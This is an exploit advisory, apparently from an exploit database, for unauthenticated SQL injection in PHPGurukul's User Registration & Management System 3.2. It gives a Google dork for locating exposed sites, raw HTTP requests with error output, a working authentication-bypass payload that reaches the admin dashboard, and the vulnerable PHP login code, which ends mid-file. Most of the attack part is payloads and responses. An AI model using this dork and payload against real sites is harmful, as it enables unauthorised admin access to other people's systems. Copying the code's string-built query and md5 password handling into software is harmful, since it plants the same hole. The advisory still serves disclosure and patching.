@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@ .:. Exploit Title > User Registration & Management System - SQLi .:. Google Dorks .:. inurl:loginsystem/index.php .:. Date: June 18, 2024 .:. Exploit Author: bRpsd .:. Contact: cy[at]live.no .:. Vendor -> https://phpgurukul.com/ .:. Product -> https://phpgurukul.com/?sdm_process_download=1&download_id=7003 .:. Product Version -> Version 3.2 .:. DBMS -> MySQL .:. Tested on > macOS [*nix Darwin Kernel], on local xampp @@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@ ############# |DESCRIPTION| ############# "User Management System is a web based technology which manages user database and provides rights to update the their details In this web application user must be registered. This web application provides a way to effectively control record & track the user details who himself/herself registered with us." =========================================================================================== Vulnerability 1: Unauthenticated SQL Injection & Authentication bypass Types: error-based File: localhost/admin/index.php Vul Parameter: USERNAME [POST] POST PoC #1: http://tom:8080/loginsystem/admin/index.php Host: tom User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:127.0) Gecko/20100101 Firefox/127.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Content-Type: application/x-www-form-urlencoded Content-Length: 38 Origin: http://tom Connection: keep-alive Referer: http://tom/loginsystem/admin/index.php Cookie: PHPSESSID=fca5cef217b48f9ec0221b75695e4f2a Upgrade-Insecure-Requests: 1 username='&password=test&login= Response: Warning: mysqli_fetch_array() expects parameter 1 to be mysqli_result, bool given in /Applications/XAMPP/xamppfiles/htdocs/loginsystem/admin/index.php on line 9 =========================================================================================== Test #2 => Payload to skip authentication http://localhost:9000/loginsystem/admin/index.php username=A' OR 1=1#&password=1&login= Response: 302 redirect to dashboard.php =========================================================================================== Vuln File:/loginsystem/admin/index.php Vul Code: <?php session_start(); include_once('../includes/config.php'); // Code for login if(isset($_POST['login'])) { $adminusername=$_POST['username']; $pass=md5($_POST['password']); $ret=mysqli_query($con,"SELECT * FROM admin WHERE username='$adminusername' and password='$pass'"); $num=mysqli_fetch_array($ret); if($num>0)